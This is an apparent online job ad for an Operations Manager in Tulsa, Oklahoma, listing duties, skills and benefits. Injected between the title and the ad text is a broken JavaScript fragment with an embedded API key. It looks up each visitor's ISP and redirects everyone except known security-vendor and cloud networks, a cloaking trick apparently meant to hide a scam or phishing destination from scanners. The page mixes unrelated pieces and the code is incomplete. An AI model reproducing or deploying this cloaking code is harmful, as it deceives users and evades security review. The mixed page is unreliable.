Operations Manager – Full Time
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Operations Manager in Tulsa, Oklahoma to oversee daily business activities and ensure efficient operation of our organization.
Responsibilities include:
- Supervising and coordinating daily operational activities across departments
- Developing and implementing policies and procedures to improve efficiency
- Managing budgets, resources, and inventory to optimize performance
- Leading, mentoring, and supporting staff to achieve departmental goals
- Ensuring compliance with safety, quality, and regulatory standards
- Analyzing operational data to identify areas for improvement
- Collaborating with leadership to develop strategic plans and initiatives
Skills needed:
- Strong leadership and communication abilities
- Excellent problem-solving and organizational skills
- Ability to analyze data and make informed decisions
- Proficiency in operational management tools and software
Benefits include:
- Competitive salary
- Health, dental, and vision insurance
- Paid time off and holidays
- Opportunities for professional growth and development